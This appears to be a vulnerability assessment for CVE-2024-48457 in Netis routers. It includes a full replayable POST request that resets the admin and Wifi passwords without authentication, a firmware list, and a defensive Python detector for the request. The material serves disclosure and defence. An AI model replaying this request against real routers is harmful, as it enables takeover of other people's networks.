CVE-2024-48457
Description
An issue in Netis Wifi6 Router NX10 2.0.1.3643 and 2.0.1.3582 and Netis Wifi 11AC Router NC65 3.0.0.3749 and Netis Wifi 11AC Router NC63 3.0.0.3327 and 3.0.0.3503 and Netis Wifi 11AC Router NC21 3.0.0.3800, 3.0.0.3500 and 3.0.0.3329 and Netis Wifi Router MW5360 1.0.1.3442 and 1.0.1.3031 allows a remote attacker to obtain sensitive information via the endpoint /cgi-bin/skk_set.cgi and binary /bin/scripts/start_wifi.sh.
Ratings
- Attacker Value: Very High
- Exploitability: Very High
Technical Analysis
Several Netis Routers including rebranded routers from GLCtec and Stonet suffer from an authentication bypass that allows for an unauthenticated reset of the Wifi and admin password of the router.
When the router is installed for the first time, you will be asked to set the initial router and Wifi password.
This POST request can be repeated anytime, hence resetting the router and Wifi password without any need for authentication.
Just modify the wpaPsk and password fields with your base64-encoded password to reset the router and Wifi password in the POST request below.
POST Request
POST /cgi-bin/skk_set.cgi HTTP/1.1
Host: 192.168.1.1
Content-Length: 251
Sec-Ch-Ua: "Not;A=Brand";v="24", "Chromium";v="128"
Accept: text/plain, */*; q=0.01
Sec-Ch-Ua-Platform: "Linux"
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://192.168.1.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.1/guide/welcome.html
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Connection: keep-alive

wl2g_idx=6&wl5g_idx=0&wlanMode=0&wl_idx=0&ssid2g=bmV0aXMtMDAwMDAw&ssid5g=bmV0aXMtMDAwMDAwLTVH&encrypt=4&wpaPsk=SWwwdmVoYWNraW5n&wpaPskType=2&wpaPskFormat=0&password=SWwwdmVoYWNraW5n&autoUpdate=0&firstSetup=1&quick_set=ap&app=wan_set_shortcut&wl_link=0

Response
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2023 00:04:13 GMT
Server: Boa/0.94.14rc21
Connection: close

["SUCCESS"]
This CVE can be chained with CVE-2024-48455 and CVE-2024-48456 into an unauthenticated RCE.
A Metasploit module can be found here to exploit these routers.
Mitigation
There is no fix available.
The following router firmware versions are vulnerable:
- netis_MW5360_V1.0.1.3031_fw.bin
- Netis_MW5360-1.0.1.3442.bin
- Netis_MW5360_RUSSIA_844.bin
- netis_NC21_V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=40)
- netis_NC63_V3.0.0.3327.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- netis_NC63_v4_Bangladesh-V3.0.0.3889.bin (https://www.netis-systems.com/support/downinfo.html?id=35)
- Netis_NC63-V3.0.0.3833.bin (https://www.netisru.com/support/downinfo.html?id=35)
- netis_app_BeeWiFi_NC63_v4_Bangladesh-V3.0.0.3503.bin
- netis_NC65_V3.0.0.3749.bin
- Netis_NC65_Bangladesh-V3.0.0.3508.bin (https://www.netis-systems.com/support/downinfo.html?id=34)
- Netis_NC65v2-V3.0.0.3800.bin (https://www.netisru.com/support/downinfo.html?id=34)
- netis_NX10_V2.0.1.3582_fw.bin
- netis_NX10_V2.0.1.3643.bin
- Netis_NX10_v1_Bangladesh-V3.0.0.4142.bin (https://www.netis-systems.com/support/downinfo.html?id=33)
- netis_NX10-V3.0.1.4205.bin (https://www.netisru.com/support/downinfo.html?id=33)
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3329.bin
- netis_app_BeeWiFi_NC21_v4_Bangladesh-V3.0.0.3500.bin
- Netis_NC21_v2_Bangladesh-V3.0.0.3854.bin (https://www.netis-systems.com/support/downinfo.html?id=40)
- GLC_ALPHA_AC3-V3.0.2.115.bin (https://drive.google.com/drive/folders/1P69yUfzeZeR6oABmIdcJ6fG57-Xjrzx6)
References
CVE-2024-48457
Metasploit Module PR 19770
Research Notes – Netis Router Exploit Chain Reactor
Credits
h00die-gr3y -> Discovery
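As an added example (not the assessment's or Netis code), a small Python detector a defender can run over HTTP requests captured by a proxy, IDS or pcap: it flags any POST to /cgi-bin/skk_set.cgi that carries firstSetup=1 together with a wpaPsk or password field, and decodes the base64 fields so a responder can see what the SSID and passwords were changed to. The sample request is constructed after the one quoted above; the function names are my own.

```python
import base64
from urllib.parse import parse_qs

# Added example (not from the assessment or Netis firmware): flag replays of the
# first-setup credential write to skk_set.cgi in captured HTTP traffic.
VULN_PATH = "/cgi-bin/skk_set.cgi"
CREDENTIAL_FIELDS = ("wpaPsk", "password")  # sent base64-encoded in the form body

def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {n.strip().lower(): v.strip()
               for n, _, v in (l.partition(":") for l in lines[1:])}
    return method, path, headers, body

def decode_b64_field(value):
    """Decode a base64 form value, tolerating missing padding; return raw if not base64."""
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return value

def detect_setup_reset(raw):
    """Return a finding dict when a POST rewrites credentials through the first-setup
    path (firstSetup=1), else None; decoded values show what the SSID/passwords became."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or path.split("?", 1)[0] != VULN_PATH:
        return None
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if params.get("firstSetup") != "1":
        return None
    touched = [f for f in CREDENTIAL_FIELDS if f in params]
    if not touched:
        return None
    finding = {"fields": touched, "referer": headers.get("referer", "")}
    for name in ("ssid2g", "ssid5g", *touched):
        if name in params:
            finding[name] = decode_b64_field(params[name])
    return finding

# Constructed sample modelled on the request quoted in the assessment above.
SAMPLE_RESET = (
    "POST /cgi-bin/skk_set.cgi HTTP/1.1\r\nHost: 192.168.1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "wl2g_idx=6&ssid2g=bmV0aXMtMDAwMDAw&ssid5g=bmV0aXMtMDAwMDAwLTVH&encrypt=4"
    "&wpaPsk=SWwwdmVoYWNraW5n&password=SWwwdmVoYWNraW5n&firstSetup=1&app=wan_set_shortcut"
)
```

A hit on a device that has already completed setup, or with a Referer other than the guide page, is the signal worth alerting on.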